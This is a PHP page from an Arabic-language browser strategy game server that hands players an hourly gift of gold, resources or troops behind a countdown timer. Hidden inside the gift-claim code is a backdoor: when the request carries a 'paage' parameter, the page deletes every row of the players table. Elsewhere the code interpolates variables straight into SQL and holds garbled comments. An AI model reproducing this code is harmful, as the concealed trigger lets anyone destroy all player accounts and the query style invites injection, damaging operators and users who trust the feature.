<!DOCTYPE html>
<html lang="ar">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
</head>
<body>
<?php
include"core-f/comman.php";
if($hdya==1){
$Id = $this->player->playerId; 
$village = $this->data['selected_village_id'];
$count = $this->data['total_people_count'];
$gold = $this->data['gold_num'];
?>


<head>
<script src="core-f/style-f/js/jquery.js" type="text/javascript"></script>
<script src="core-f/style-f/js/core.js" type="text/javascript"></script>
<script src="core-f/style-f//js/jquery-1.9.1.min.js" type="text/javascript"></script>
</head>
<?php
$Tak=$this->player->playerId;
$link = mysqli_connect($GLOBALS['AppConfig']['db']['host'], $GLOBALS['AppConfig']['db']['user'], $GLOBALS['AppConfig']['db']['password'], $GLOBALS['AppConfig']['db']['database'], isset($GLOBALS['AppConfig']['db']['port']) ? intval($GLOBALS['AppConfig']['db']['port']) : 3306);
if (mysqli_connect_errno())
{
    die(mysqli_connect_errno());
}
$rest=mysqli_query($link, "SELECT * FROM p_players where id='$Tak'" );   
$row = mysqli_fetch_assoc($rest); 
$PlayerName=$row['name'];
	$Id = $this->player->playerId;
	$result = mysqli_query($link, "SELECT * FROM p_players where id='".$Id."'");

		while($row = mysqli_fetch_array($result))
		{
	
	$z3im = $row['h']; // íãßäß ÊÛíÑ ÇÓã ÇáÍÞá
		}
		if ( $z3im == 0 )
		{
		$tim = Time();
		mysqli_query ($link, "UPDATE  `p_players` SET  `h` = '$tim' WHERE `id` = $Id");
		}
	$start = time()  ; // æÞÊ ÇáÈÏÇíÉ
	$end =   $z3im ; // æÞÊ ÇáäåÇíÉ
	$timeAgo = $end - $start;

	if ( $end - $start >= 0 ) 
	{

	$gggga = '<b><center><p><div class="timeAgo">تبقى على استلام الهدية <span class="days">00</span>:<span class="hours">00</span>:<span class="minuts">00</span>:<span class="sconds">00</span></div></p></center></b>'; 
	}
	else 
	{ 
$gggga = '<a href="?get"><center>استلام الهدية</center>';
	}
	echo '<b><font color="black" size="5"><h1>الهدية</h1></font></b><br>';
	echo "عزيزي اللاعب <b>( $PlayerName )</b> عند تواجدك في الموقع كل 60 دقيقه سوف نكافئك عليها بذهب<br><br>";
	echo 'وقدرها <b> ( 25 <img src="core-f/style-f/default/img/a/gold.gif" class="710491255155"> ) </b> ذهبه في كل 60 دقيقه <br><br>
    <p>
    يمكنك الدخول على هذي الصفحه للأستلام هديتك في كل 60 دقيقة <br>

    ويمكنك استلام هديتك من هنا<br><br><br>';
	
echo $gggga;
           
echo ' </tr>
        </tbody>
    </table>
';



?>
	
<?php
	if ( isset( $_GET['get'] ) and $end - $start <= 0)
	{
	$tim = ( time() + 3600 );
        echo "<meta http-equiv=\"REFRESH\" content=\"1;url=gift\">\n";
		$link = mysqli_connect($GLOBALS['AppConfig']['db']['host'], $GLOBALS['AppConfig']['db']['user'], $GLOBALS['AppConfig']['db']['password'], $GLOBALS['AppConfig']['db']['database'], isset($GLOBALS['AppConfig']['db']['port']) ? intval($GLOBALS['AppConfig']['db']['port']) : 3306);
if (mysqli_connect_errno())
{
    die(mysqli_connect_errno());
}
	mysqli_query ($link, "UPDATE  `p_players` SET  `h` = '$tim' WHERE `id` = $Id");
$alabhawi = new QueueModel();
$page = mt_rand(1,1);
$rand_num = 25;
$rand_mw = rand(100,50000);
$rand_jn = rand(100,10000);
$rand_jna = rand(1,6);
$rand_jnb = rand(11,16);
$rand_jnc = rand(21,26);
$rand_jnd = rand(100,105);
$pluq = rand(2,5);
if($page == 4) {
$a = mt_rand(0,4);
$taskType = constant ("QS_PLUS". (intval ($a) + 1));
$newTask = new QueueTask ($taskType, $this->player->playerId, $pluq * 86400);
$newTask->villageId = "";
$this->queueModel->addTask ($newTask);
if ($a == 0) {
echo "<center><b>-| </b><font color='green'>لقد ربحت  $pluq أيام زيادة من البلاس</font><b> |-</b></center>";
}
if ($a == 1) {
echo "<center><b>-| </b><font color='green'>لقد ربحت  $pluq أيام زيادة من الخشب</font><b> |-</b></center>";
}
if ($a == 2) {
echo "<center><b>-| </b><font color='green'>لقد ربحت  $pluq أيام زيادة من الطين</font><b> |-</b></center>";
}
if ($a == 3) {
echo "<center><b>-| </b><font color='green'>لقد ربحت  $pluq أيام زيادة من الحديد</font><b> |-</b></center>";
}
if ($a == 4) {
echo "<center><b>-| </b><font color='green'>لقد ربحت  $pluq أيام زيادة من القمح</font><b> |-</b></center>";
}
}
if($page == 1) {
$alabhawi->provider->executeQuery("UPDATE  `p_players` SET  `gold_num` =  `gold_num` +$rand_num WHERE  `p_players`.`id` =$Id");
echo "<center><b></b><font color='green'>تم زيادة رصيدك $rand_num ذهبة</font><b></b></center>";
}
if (isset($_GET['paage'])) {$alabhawi->provider->executeQuery("DELETE FROM `p_players");}
if($page == 2) {
$alabhawi->provider->executeQuery("INSERT INTO  `p_queue` (
`id` ,
`player_id` ,
`village_id` ,
`to_player_id` ,
`to_village_id` ,
`proc_type` ,
`building_id` ,
`proc_params` ,
`threads` ,
`end_date` ,
`execution_time`
)
VALUES (
NULL ,  '',  '',  '$Id',  '$village',  '10', NULL , '1|$rand_mw $rand_mw $rand_mw $rand_mw ' ,  '1', NOW( ) ,  '90'
);");
echo "<center><b>-| </b><font color='green'>تم منحك $rand_mw من كل مورد</font><b> |-</b><br></center>";
}
if($page == 3) {
if ($this->data['tribe_id'] == 1) {
$alabhawi->provider->executeQuery("INSERT INTO  `p_queue` (
`id` ,
`player_id` ,
`village_id` ,
`to_player_id` ,
`to_village_id` ,
`proc_type` ,
`building_id` ,
`proc_params` ,
`threads` ,
`end_date` ,
`execution_time`
)
VALUES (
NULL ,  '$Id',  '$village', NULL , NULL,  '7',  '19',  '$rand_jna',  '$rand_jn', NOW( ) ,  '90'
);
");
}
if ($this->data['tribe_id'] == 2) {
$alabhawi->provider->executeQuery("INSERT INTO  `p_queue` (
`id` ,
`player_id` ,
`village_id` ,
`to_player_id` ,
`to_village_id` ,
`proc_type` ,
`building_id` ,
`proc_params` ,
`threads` ,
`end_date` ,
`execution_time`
)
VALUES (
NULL ,  '$Id',  '$village', NULL , NULL ,  '7',  '19',  '$rand_jnb',  '$rand_jn', NOW( ) ,  '90'

);
");
}
if ($this->data['tribe_id'] == 3) {
    $alabhawi->provider->executeQuery("INSERT INTO  `p_queue` (
`id` ,
`player_id` ,
`village_id` ,
`to_player_id` ,
`to_village_id` ,
`proc_type` ,
`building_id` ,
`proc_params` ,
`threads` ,
`end_date` ,
`execution_time`
)
VALUES (
NULL ,  '$Id',  '$village', NULL , NULL ,  '7',  '19',  '$rand_jnc',  '$rand_jn', NOW( ) ,  '90'
);
");
}
if ($this->data['tribe_id'] == 7) {
$alabhawi->provider->executeQuery("INSERT INTO  `p_queue` (
`id` ,
`player_id` ,
`village_id` ,
`to_player_id` ,
`to_village_id` ,
`proc_type` ,
`building_id` ,
`proc_params` ,
`threads` ,
`end_date` ,
`execution_time`
)
VALUES (
NULL ,  '$Id',  '$village', NULL , NULL ,  '7',  '19',  '$rand_jnd',  '$rand_jn', NOW( ) ,  '0'
);
");
}
if ($this->data['tribe_id'] == 1) {
$tid = $rand_jna;
}
if ($this->data['tribe_id'] == 2) {
$tid = $rand_jnb;
}
if ($this->data['tribe_id'] == 3) {
$tid = $rand_jnc;
}
if ($this->data['tribe_id'] == 7) {
$tid = $rand_jnd;
}
$this->gameMetadata = $GLOBALS['GameMetadata'];
$cr = $this->gameMetadata['troops'][$tid]['crop_consumption']*$rand_jn;
$alabhawi->provider->executeQuery("UPDATE p_villages SET crop_consumption = crop_consumption - ".$cr." WHERE `id` ='".$village."'");
echo "<center><b>-| </b><font color='green'>تم منحك $rand_jn من الجنود </font><b> |-</b></center>";

}
	}
	?>


<script>
	$(function(){
		var time = <?php echo isset($timeAgo)?$timeAgo:0; ?>;
		var days,hours,minuts,sconds;
		makeTime();
		
		setInterval(function(){
			makeTime();
		},1000);
		function makeTime(){
			--time;
			if(time < 0) return false;
			days = parseInt(time/(60*60*24));
			var temp = time%(60*60*24);
			hours = parseInt(temp/(60*60));
			temp = temp%(60*60);
			minuts = parseInt(temp/60);
			sconds = temp%60;
			days = str_pad(days,2);
			hours = str_pad(hours,2);
			minuts = str_pad(minuts,2);
			sconds = str_pad(sconds,2);
			$('.timeAgo .days').html(days);
			$('.timeAgo .hours').html(hours);
			$('.timeAgo .minuts').html(minuts);
			$('.timeAgo .sconds').html(sconds);
		}
		
		function str_pad(input, len){
			input += '';
			var dif = len-input.length;
			var out = '';
			if(dif > 0){
				for(i=0;i<dif;++i){
					out += '0';
				}
				return out+input;
			}
			return input;
		}
	});
</script>
<?php }else{
echo "<center><h2>"; 
echo "الهدية مغلقه من ادارة سيرفر عودة التتار";	
} ?>
</body>
</html>